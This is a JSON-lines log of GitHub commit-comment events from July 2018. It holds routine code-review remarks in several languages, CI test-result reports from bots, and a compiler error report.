{"id":"7967583795","type":"CommitCommentEvent","actor":{"login":"mrGlebao"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29713358,"position":37,"line":42,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/userLoader/UserDetailsLoader.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T16:10:31Z","updated_at":"2018-07-15T16:10:31Z","author_association":"NONE","body":"Это нужно?"}},"created_at":"2018-07-15T16:10:31Z"}
{"id":"7967585434","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29713359,"position":null,"line":null,"path":null,"commit_id":"95faa9a3e198435d4982273370ba8b83a54e8629","created_at":"2018-07-15T16:11:42Z","updated_at":"2018-07-15T16:11:42Z","author_association":"COLLABORATOR","body":"Puzzle `857-a6f9cdd0` discovered in   [`src/main/java/ru/mystamps/web/service/SeriesImportServiceImpl.java`](  https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/service/SeriesImportServiceImpl.java)   and submitted as #923. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-15T16:11:42Z"}
{"id":"7967586043","type":"CommitCommentEvent","actor":{"login":"mrGlebao"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29713360,"position":62,"line":57,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/userLoader/UserDetailsLoader.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T16:12:09Z","updated_at":"2018-07-15T16:12:09Z","author_association":"NONE","body":"Ок, понял. В отдельном коммите я вынесу создание юзера в UserStubService, который мы потом грохнем."}},"created_at":"2018-07-15T16:12:09Z"}
{"id":"7967587171","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29713361,"position":null,"line":null,"path":null,"commit_id":"95faa9a3e198435d4982273370ba8b83a54e8629","created_at":"2018-07-15T16:12:59Z","updated_at":"2018-07-15T16:12:59Z","author_association":"COLLABORATOR","body":"Puzzle `857-719bea28` discovered in   [`src/test/robotframework/series/import/request-logic.robot`](  https://github.com/php-coder/mystamps/blob/master/src/test/robotframework/series/import/request-logic.robot)   and submitted as #924. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-15T16:12:59Z"}
{"id":"7967587698","type":"CommitCommentEvent","actor":{"login":"mrGlebao"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29713364,"position":78,"line":73,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/userLoader/UserDetailsLoader.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T16:13:22Z","updated_at":"2018-07-15T16:13:22Z","author_association":"NONE","body":"Не нужно"}},"created_at":"2018-07-15T16:13:22Z"}
{"id":"7967589940","type":"CommitCommentEvent","actor":{"login":"mrGlebao"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29713370,"position":81,"line":81,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/hl/HLProvider.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T16:15:15Z","updated_at":"2018-07-15T16:15:15Z","author_association":"NONE","body":"Тупой вопрос, но сюда нужно не из конфигов значения?"}},"created_at":"2018-07-15T16:15:15Z"}
{"id":"7967590184","type":"CommitCommentEvent","actor":{"login":"StealthySemicolon"},"repo":{"name":"OpenGenus/cosmos"},"payload":{"comment":{"id":29713374,"position":null,"line":null,"path":null,"commit_id":"3fe4a8ada439b1f105c5aacd5b215f1b18f1a72e","created_at":"2018-07-15T16:15:27Z","updated_at":"2018-07-15T16:15:27Z","author_association":"NONE","body":"Isn't this called lowerCamelCase?"}},"created_at":"2018-07-15T16:15:27Z"}
{"id":"7967590320","type":"CommitCommentEvent","actor":{"login":"lindhe"},"repo":{"name":"lindhe/dotfiles"},"payload":{"comment":{"id":29713375,"position":null,"line":null,"path":null,"commit_id":"de2371cbeacb1c6d7fb36a1f6d09b36197182fd6","created_at":"2018-07-15T16:15:33Z","updated_at":"2018-07-15T16:15:33Z","author_association":"OWNER","body":"Oh, and e4f4ce9! Forgot about that."}},"created_at":"2018-07-15T16:15:33Z"}
{"id":"7967591393","type":"CommitCommentEvent","actor":{"login":"ganchix"},"repo":{"name":"ganchix/testcontainers-java-module-ganache"},"payload":{"comment":{"id":29713376,"position":5,"line":16,"path":"pom.xml","commit_id":"f140dc55e1d2b4766eb86092cf4dd03b7f0cfcf3","created_at":"2018-07-15T16:16:27Z","updated_at":"2018-07-15T16:16:27Z","author_association":"OWNER","body":"Don't change version number, Travis will do it in next release "}},"created_at":"2018-07-15T16:16:27Z"}
{"id":"7967592500","type":"CommitCommentEvent","actor":{"login":"mrGlebao"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29713378,"position":46,"line":45,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/entities/User.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T16:17:24Z","updated_at":"2018-07-15T16:17:24Z","author_association":"NONE","body":"Понял."}},"created_at":"2018-07-15T16:17:24Z"}
{"id":"7967592707","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29713379,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-15T16:17:35Z","updated_at":"2018-07-15T16:17:35Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-MacOS-10.9-clang: Tests Failed (2362 of 2924 tests passed, 61 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 498 tests had: ESO small diffs.\n * 558 tests had: Table big diffs.\n * 358 tests had: MTR small diffs.\n * 1 test had: BND diffs.\n * 86 tests had: ESO big diffs.\n * 99 tests had: AUD diffs.\n * 41 tests had: MTR big diffs.\n * 34 tests had: ZSZ small diffs.\n * 19 tests had: ERR diffs.\n * 2 tests had: MTD diffs.\n * 12 tests had: SSZ small diffs.\n * 3 tests had: Table small diffs.\n * 3 tests had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 61\n * Failed: 562\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.78%25-red.png)</a> \n"}},"created_at":"2018-07-15T16:17:35Z"}
{"id":"7967593212","type":"CommitCommentEvent","actor":{"login":"mrGlebao"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29713381,"position":68,"line":76,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/entities/User.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T16:18:02Z","updated_at":"2018-07-15T16:18:02Z","author_association":"NONE","body":"Геттер"}},"created_at":"2018-07-15T16:18:02Z"}
{"id":"7967593370","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29713382,"position":null,"line":null,"path":null,"commit_id":"33f27d89ccb974bfc40a57392ba27be894f8ff8c","created_at":"2018-07-15T16:18:10Z","updated_at":"2018-07-15T16:18:10Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.225`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/225) :tada:"}},"created_at":"2018-07-15T16:18:10Z"}
{"id":"7967594684","type":"CommitCommentEvent","actor":{"login":"mrGlebao"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29713385,"position":49,"line":49,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/hl/HLProvider.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T16:19:20Z","updated_at":"2018-07-15T16:19:20Z","author_association":"NONE","body":"Нужно или нет?"}},"created_at":"2018-07-15T16:19:20Z"}
{"id":"7967595181","type":"CommitCommentEvent","actor":{"login":"ganchix"},"repo":{"name":"ganchix/testcontainers-java-module-ganache"},"payload":{"comment":{"id":29713387,"position":19,"line":9,"path":"src/main/java/io/github/ganchix/ganache/Account.java","commit_id":"f140dc55e1d2b4766eb86092cf4dd03b7f0cfcf3","created_at":"2018-07-15T16:19:42Z","updated_at":"2018-07-15T16:19:42Z","author_association":"OWNER","body":"With public field you broke encapsulation, https://www.geeksforgeeks.org/encapsulation-in-java/ for that I want stil using lombok, save a lot lines of code "}},"created_at":"2018-07-15T16:19:42Z"}
{"id":"7967595225","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29713388,"position":null,"line":null,"path":null,"commit_id":"33f27d89ccb974bfc40a57392ba27be894f8ff8c","created_at":"2018-07-15T16:19:44Z","updated_at":"2018-07-15T16:19:44Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.341`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/404161346) :tada:"}},"created_at":"2018-07-15T16:19:44Z"}
{"id":"7967595829","type":"CommitCommentEvent","actor":{"login":"Bugaja"},"repo":{"name":"pmoulon/CMVS-PMVS"},"payload":{"comment":{"id":29713390,"position":null,"line":null,"path":null,"commit_id":"9c4cbe2188e06a7059f442ad64795ccf27e46a38","created_at":"2018-07-15T16:20:10Z","updated_at":"2018-07-15T16:20:10Z","author_association":"NONE","body":"Hi Guys,\r\n\r\nHaving this same issue. \r\n\r\n```\r\nScanning dependencies of target cmvs_lib\r\n[  1%] Building CXX object base/cmvs/CMakeFiles/cmvs_lib.dir/bundle.cc.o\r\nIn file included from /Users/Aaron/CMVS-PMVS-master/program/base/cmvs/bundle.cc:10:\r\nIn file included from /Users/Aaron/CMVS-PMVS-master/program/base/cmvs/bundle.h:15:\r\nIn file included from /Users/Aaron/CMVS-PMVS-master/program/base/cmvs/../stann/sfcnn.hpp:31:\r\nIn file included from /Users/Aaron/CMVS-PMVS-master/program/base/cmvs/../stann/zorder_lt.hpp:20:\r\n/Users/Aaron/CMVS-PMVS-master/program/base/cmvs/../stann/dpoint.hpp:491:12: error: \r\n      no viable conversion from 'std::__1::locale' to 'char'\r\n                           char errorpoint = is.getloc();\r\n                                ^            ~~~~~~~~~~~\r\n1 error generated.\r\nmake[2]: *** [base/cmvs/CMakeFiles/cmvs_lib.dir/bundle.cc.o] Error 1\r\nmake[1]: *** [base/cmvs/CMakeFiles/cmvs_lib.dir/all] Error 2\r\nmake: *** [all] Error 2\r\nlibpba.so failed to build, halting....\r\nAarons-MacBook-Pro:~ Aaron$ \r\n\r\n```\r\nI tried to insert as indicated above, but when I save that line into the dpoint.hpp code, then reopen the code in xcode, the saved changes dissapear, and thus I keep getting the same error when I run the .sh\r\n\r\nif(!is.eof()){\r\n//char errorpoint = is.getloc();\r\n`streampos errorpoint = is.tellg();`\r\nstd::cerr << \"Error Reading Point:\"\r\n<< errorpoint << std::endl;\r\nexit(1);\r\n}\r\n\r\nAny insight?"}},"created_at":"2018-07-15T16:20:10Z"}
{"id":"7967596150","type":"CommitCommentEvent","actor":{"login":"ganchix"},"repo":{"name":"ganchix/testcontainers-java-module-ganache"},"payload":{"comment":{"id":29713391,"position":28,"line":19,"path":"src/main/java/io/github/ganchix/ganache/GanacheContainer.java","commit_id":"f140dc55e1d2b4766eb86092cf4dd03b7f0cfcf3","created_at":"2018-07-15T16:20:22Z","updated_at":"2018-07-15T16:20:22Z","author_association":"OWNER","body":"Use lombok instead of declare the logger. "}},"created_at":"2018-07-15T16:20:22Z"}
{"id":"7967596609","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29713396,"position":null,"line":null,"path":null,"commit_id":"02bc96d76c2f4eaea4ecf9dd991dc419119c1d59","created_at":"2018-07-15T16:20:41Z","updated_at":"2018-07-15T16:20:41Z","author_association":"MEMBER","body":"This is not cleanup."}},"created_at":"2018-07-15T16:20:41Z"}
{"id":"7967597242","type":"CommitCommentEvent","actor":{"login":"Fagneregomes"},"repo":{"name":"Fagneregomes/exercicios_react"},"payload":{"comment":{"id":29713397,"position":10,"line":10,"path":"ex/component.jsx","commit_id":"3158a726ec23b41968d60a493f71c9be60c6c91f","created_at":"2018-07-15T16:21:09Z","updated_at":"2018-07-15T16:21:09Z","author_association":"OWNER","body":"simplificando a função.\r\n"}},"created_at":"2018-07-15T16:21:09Z"}
{"id":"7967597331","type":"CommitCommentEvent","actor":{"login":"ganchix"},"repo":{"name":"ganchix/testcontainers-java-module-ganache"},"payload":{"comment":{"id":29713398,"position":54,"line":42,"path":"src/main/java/io/github/ganchix/ganache/GanacheContainer.java","commit_id":"f140dc55e1d2b4766eb86092cf4dd03b7f0cfcf3","created_at":"2018-07-15T16:21:12Z","updated_at":"2018-07-15T16:21:12Z","author_association":"OWNER","body":"Use logger system. "}},"created_at":"2018-07-15T16:21:12Z"}
{"id":"7967606978","type":"CommitCommentEvent","actor":{"login":"ganchix"},"repo":{"name":"ganchix/testcontainers-java-module-ganache"},"payload":{"comment":{"id":29713421,"position":29,"line":40,"path":"src/main/java/io/github/ganchix/ganache/LogGanacheExtractorConsumer.java","commit_id":"f140dc55e1d2b4766eb86092cf4dd03b7f0cfcf3","created_at":"2018-07-15T16:29:11Z","updated_at":"2018-07-15T16:29:11Z","author_association":"OWNER","body":"Maybe is good check if parameter address starts with 0x to avoid exceptions if log change "}},"created_at":"2018-07-15T16:29:11Z"}
{"id":"7967607256","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29713422,"position":null,"line":null,"path":null,"commit_id":"d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b","created_at":"2018-07-15T16:29:22Z","updated_at":"2018-07-15T16:29:22Z","author_association":"NONE","body":"#6517-MissingEquationReference (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1692 of 1692 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-15T16:29:22Z"}
{"id":"7967609266","type":"CommitCommentEvent","actor":{"login":"ganchix"},"repo":{"name":"ganchix/testcontainers-java-module-ganache"},"payload":{"comment":{"id":29713428,"position":null,"line":null,"path":null,"commit_id":"f140dc55e1d2b4766eb86092cf4dd03b7f0cfcf3","created_at":"2018-07-15T16:30:48Z","updated_at":"2018-07-15T16:30:48Z","author_association":"OWNER","body":"Thank you for your merge request @turbospaces please check the comments to accept it. "}},"created_at":"2018-07-15T16:30:48Z"}
{"id":"7967610174","type":"CommitCommentEvent","actor":{"login":"rishabhkalra96"},"repo":{"name":"rishabhkalra96/PWA_Example"},"payload":{"comment":{"id":29713430,"position":null,"line":null,"path":null,"commit_id":"975d6ad2b64bd1ddecbcc3e471a244ea44d133b6","created_at":"2018-07-15T16:31:34Z","updated_at":"2018-07-15T16:31:34Z","author_association":"OWNER","body":"In accordance with the previous commit  #7610800, This code snippet describes how to make sure you don't store old caches in the browser so that your service worker always accesses the updated cache.\r\nThe same can be done for dynamic cache too....\r\nThe above code sample triggers a waitUntil event and forces to execute the block inside which is as follows\r\nfirst locate all the cache names based on the keys, which is returned as a list, this list is then converted to promise using the map function on every key item, the promise returned will contain only those key names which are not equal to \"static_cache-v3\" and \"dynamic_cache\", delete them by calling caches.delete().\r\nThe remaining cache keys are the filtered keys based on above condition."}},"created_at":"2018-07-15T16:31:34Z"}
{"id":"7967611761","type":"CommitCommentEvent","actor":{"login":"ZeroEpoch1969"},"repo":{"name":"ZeroEpoch1969/RubyRoseBot"},"payload":{"comment":{"id":29713434,"position":null,"line":null,"path":null,"commit_id":"35971e3b251b5f3a2a5143ea346b4e4c372b7c00","created_at":"2018-07-15T16:32:58Z","updated_at":"2018-07-15T16:32:58Z","author_association":"OWNER","body":"stupid notepad++ tabbing"}},"created_at":"2018-07-15T16:32:58Z"}
{"id":"7967613817","type":"CommitCommentEvent","actor":{"login":"paluh"},"repo":{"name":"khanage/purescript-indexed-monad"},"payload":{"comment":{"id":29713438,"position":null,"line":null,"path":null,"commit_id":"cf105603868fddc2bcc8eb14778aa8645599929f","created_at":"2018-07-15T16:34:46Z","updated_at":"2018-07-15T16:34:46Z","author_association":"NONE","body":"I can provide a PR with working bower.json: https://github.com/lambdaterms-forks/purescript-indexed-monad/commit/d037d70e8d44851f56d6162345b0b0aa2d514bfa"}},"created_at":"2018-07-15T16:34:46Z"}
{"id":"7967614041","type":"CommitCommentEvent","actor":{"login":"Raiv"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29713439,"position":49,"line":49,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/hl/HLProvider.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T16:34:59Z","updated_at":"2018-07-15T16:34:59Z","author_association":"COLLABORATOR","body":"нужно. то где нужно пока в процессе."}},"created_at":"2018-07-15T16:34:59Z"}
{"id":"7967615038","type":"CommitCommentEvent","actor":{"login":"juliushaertl"},"repo":{"name":"nextcloud/deck"},"payload":{"comment":{"id":29713440,"position":34,"line":130,"path":"tests/unit/controller/BoardApiControllerTest.php","commit_id":"ede21444aed876ef2bfc19c0eaa4378e7a53f3c7","created_at":"2018-07-15T16:35:51Z","updated_at":"2018-07-15T16:35:51Z","author_association":"MEMBER","body":"The board service should throw a NoPermissionEyception for this test case. Since we're unit testing there is no need to check if the PermissionService method is called. We can just assume that this is handled correctly."}},"created_at":"2018-07-15T16:35:51Z"}
{"id":"7967615926","type":"CommitCommentEvent","actor":{"login":"jarne"},"repo":{"name":"survanetwork/Worlds"},"payload":{"comment":{"id":29713441,"position":4,"line":4,"path":"plugin.yml","commit_id":"5d797444606bb81db3942aae1f64186c1eb32cb1","created_at":"2018-07-15T16:36:37Z","updated_at":"2018-07-15T16:36:37Z","author_association":"MEMBER","body":"4.0.0 is not an official version, it’s just the development build which you should only use on a development server. Please use 3.0.x on your server, then the plugin will work."}},"created_at":"2018-07-15T16:36:37Z"}
{"id":"7967617152","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29713442,"position":null,"line":null,"path":null,"commit_id":"13773bd2c653d353762ea62ae79bb403cab68011","created_at":"2018-07-15T16:37:39Z","updated_at":"2018-07-15T16:37:39Z","author_association":"NONE","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2318 of 2318 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13773bd2c653d353762ea62ae79bb403cab68011-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13773bd2c653d353762ea62ae79bb403cab68011-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-15T16:37:39Z"}
{"id":"7967618628","type":"CommitCommentEvent","actor":{"login":"brettwooldridge"},"repo":{"name":"brettwooldridge/NuProcess"},"payload":{"comment":{"id":29713443,"position":43,"line":49,"path":"src/main/java/com/zaxxer/nuprocess/linux/EpollEvent.java","commit_id":"4989a9edc2a8f0dbed19bc03b9dfaa6a0963067d","created_at":"2018-07-15T16:39:01Z","updated_at":"2018-07-15T16:39:01Z","author_association":"OWNER","body":"@bturner Ok, that was easier than expected.  The build is setup to trigger at shippable.com.\r\n\r\nSure enough, with ALIGN_NONE, the tests hang (at a minimum) during the ``InterruptTest``.  The ``ThreadedTest`` times out at its 80 second limit.\r\n\r\nI changed it back to ``ALIGN_GNUC`` and the build and tests now succeed.  Of course, the ``EpollEventTest`` assertion of the structure size as ``12`` failed -- it is reported as 16 with ``ALIGN_GNUC`` even though the ``__EPOLL_PACKED`` stanza remains.\r\n\r\nIf you want to experiment, I believe if you create a pull request with changes, it will run a build that you can examine.  I'll be sure not to merge such a test pull request, and you can flag it in the comments as well.\r\n"}},"created_at":"2018-07-15T16:39:01Z"}
{"id":"7967618963","type":"CommitCommentEvent","actor":{"login":"Raiv"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29713444,"position":81,"line":81,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/hl/HLProvider.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T16:39:19Z","updated_at":"2018-07-15T16:39:19Z","author_association":"COLLABORATOR","body":"1) пока хз. делаю максимально универсально\r\n2) ну можно сразу ноннулл с нуллаблом расставить"}},"created_at":"2018-07-15T16:39:19Z"}
{"id":"7967619257","type":"CommitCommentEvent","actor":{"login":"fornwall"},"repo":{"name":"termux/termux-packages"},"payload":{"comment":{"id":29713445,"position":null,"line":null,"path":null,"commit_id":"072781ed1c378ab6d4b7c81dfba4260af8838c69","created_at":"2018-07-15T16:39:34Z","updated_at":"2018-07-15T16:39:34Z","author_association":"CONTRIBUTOR","body":"> I don't suppose it specifically requires gawk anyway, otherwise it would have hardcoded it, no? It's another story if busybox awk is simply flawed/broken.\r\n\r\nAs I understand it busybox awk certainly has its limitations. See e.g. here (which is a few years old):\r\nhttps://wiki.alpinelinux.org/wiki/Awk\r\n\r\n@its-pointless @Grimler91 Could you check if texindex works with busybox awk?"}},"created_at":"2018-07-15T16:39:34Z"}
{"id":"7967620597","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29713446,"position":34,"line":25,"path":"src/hdskins/java/com/voxelmodpack/hdskins/gui/EntityPlayerModel.java","commit_id":"915c69b7924953e120cb644bb4f1ac2fe5528061","created_at":"2018-07-15T16:40:43Z","updated_at":"2018-07-15T16:40:43Z","author_association":"MEMBER","body":"No static imports please. There are very few exceptions."}},"created_at":"2018-07-15T16:40:43Z"}
{"id":"7967621174","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29713447,"position":30,"line":31,"path":"src/hdskins/java/com/voxelmodpack/hdskins/gui/EntityPlayerModel.java","commit_id":"915c69b7924953e120cb644bb4f1ac2fe5528061","created_at":"2018-07-15T16:41:14Z","updated_at":"2018-07-15T16:41:14Z","author_association":"MEMBER","body":"This should stay."}},"created_at":"2018-07-15T16:41:14Z"}
{"id":"7967621282","type":"CommitCommentEvent","actor":{"login":"pablomeza10"},"repo":{"name":"TheAndroidMaster/Alarmio"},"payload":{"comment":{"id":29713448,"position":null,"line":null,"path":null,"commit_id":"1a437a6109a40dffb51c0ba6794ca9a7bda804a8","created_at":"2018-07-15T16:41:21Z","updated_at":"2018-07-15T16:41:21Z","author_association":"NONE","body":"I had to finish this on my phone and well, GitHub doesn't work well on phones. I think I named it correctly. Correct me if I didn't place it in the values folder."}},"created_at":"2018-07-15T16:41:21Z"}
{"id":"7967621710","type":"CommitCommentEvent","actor":{"login":"miguelsousa"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29713449,"position":null,"line":null,"path":null,"commit_id":"675977f1d8afdeedd771fd7b48934a5c353108cf","created_at":"2018-07-15T16:41:44Z","updated_at":"2018-07-15T16:41:44Z","author_association":"MEMBER","body":"@anthrotype please check if you can cancel builds now"}},"created_at":"2018-07-15T16:41:44Z"}
{"id":"7967621844","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29713450,"position":34,"line":25,"path":"src/hdskins/java/com/voxelmodpack/hdskins/gui/EntityPlayerModel.java","commit_id":"915c69b7924953e120cb644bb4f1ac2fe5528061","created_at":"2018-07-15T16:41:52Z","updated_at":"2018-07-15T16:41:52Z","author_association":"MEMBER","body":"Alright. I thought I'd try something new here."}},"created_at":"2018-07-15T16:41:52Z"}
{"id":"7967622872","type":"CommitCommentEvent","actor":{"login":"felixmosh"},"repo":{"name":"wix/wix-style-processor"},"payload":{"comment":{"id":29713451,"position":null,"line":null,"path":null,"commit_id":"727babe34df0a5f95e6069f7fb25697f23ca6b2c","created_at":"2018-07-15T16:42:50Z","updated_at":"2018-07-15T16:42:50Z","author_association":"MEMBER","body":"@eranshabi can u review?"}},"created_at":"2018-07-15T16:42:50Z"}
{"id":"7967623624","type":"CommitCommentEvent","actor":{"login":"Youkai-no-nii-chan"},"repo":{"name":"AlexanderUglov/SimpleAlgorithms"},"payload":{"comment":{"id":29713454,"position":42,"line":46,"path":"SimpleAlgorithms/ListsTesting/Testing/TestingFour.cs","commit_id":"af77e095f93d8e325dde349e94c96915fffe546e","created_at":"2018-07-15T16:43:34Z","updated_at":"2018-07-15T16:43:34Z","author_association":"COLLABORATOR","body":"Тут должно быть `k*2`, а не `k*k`. Например, так как число 3 простое, то мы должны вычеркнуть 6, 9 и т. д."}},"created_at":"2018-07-15T16:43:34Z"}
{"id":"7967624201","type":"CommitCommentEvent","actor":{"login":"tpepper"},"repo":{"name":"kubernetes/sig-release"},"payload":{"comment":{"id":29713455,"position":null,"line":null,"path":null,"commit_id":"b0224ac303eab9ee808e18842d0cca4b20f7f7a6","created_at":"2018-07-15T16:44:04Z","updated_at":"2018-07-15T16:44:04Z","author_association":"CONTRIBUTOR","body":"/lgtm \r\nWe’ve articulated this desire, should have on calendar and point to it as @justaugustus et al are collecting features "}},"created_at":"2018-07-15T16:44:04Z"}
{"id":"7967624882","type":"CommitCommentEvent","actor":{"login":"Raiv"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29713457,"position":56,"line":73,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/repository/SpringDataUserRepositoryProxy.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T16:44:36Z","updated_at":"2018-07-15T16:44:36Z","author_association":"COLLABORATOR","body":"угу, тут согласен"}},"created_at":"2018-07-15T16:44:36Z"}
{"id":"7967626458","type":"CommitCommentEvent","actor":{"login":"fornwall"},"repo":{"name":"termux/termux-packages"},"payload":{"comment":{"id":29713462,"position":null,"line":null,"path":null,"commit_id":"997acb7b4fac74d55d98c29869cd8a5cda6f64fc","created_at":"2018-07-15T16:45:56Z","updated_at":"2018-07-15T16:45:56Z","author_association":"CONTRIBUTOR","body":"@tomty89 Thanks, I've updated it in 6d0bb9fc31c9b1a2966ebb21429fb63f30fed03c now!"}},"created_at":"2018-07-15T16:45:56Z"}
{"id":"7967626624","type":"CommitCommentEvent","actor":{"login":"Youkai-no-nii-chan"},"repo":{"name":"AlexanderUglov/SimpleAlgorithms"},"payload":{"comment":{"id":29713465,"position":20,"line":24,"path":"SimpleAlgorithms/ListsTesting/Testing/TestingFour.cs","commit_id":"af77e095f93d8e325dde349e94c96915fffe546e","created_at":"2018-07-15T16:46:06Z","updated_at":"2018-07-15T16:46:06Z","author_association":"COLLABORATOR","body":"IsPrime подразумевает, что у тебя могут быть только значение true и false. Поэтому надо использовать bool.\r\nЕсли использовать вместо этого 1 и 0, то так менее читаемо и больше шансов набаговать (проставить 2, например)."}},"created_at":"2018-07-15T16:46:06Z"}
{"id":"7967628210","type":"CommitCommentEvent","actor":{"login":"Youkai-no-nii-chan"},"repo":{"name":"AlexanderUglov/SimpleAlgorithms"},"payload":{"comment":{"id":29713470,"position":25,"line":29,"path":"SimpleAlgorithms/ListsTesting/Testing/TestingFour.cs","commit_id":"af77e095f93d8e325dde349e94c96915fffe546e","created_at":"2018-07-15T16:47:35Z","updated_at":"2018-07-15T16:47:35Z","author_association":"COLLABORATOR","body":"Аналогично, тут лучше использовать bool."}},"created_at":"2018-07-15T16:47:35Z"}
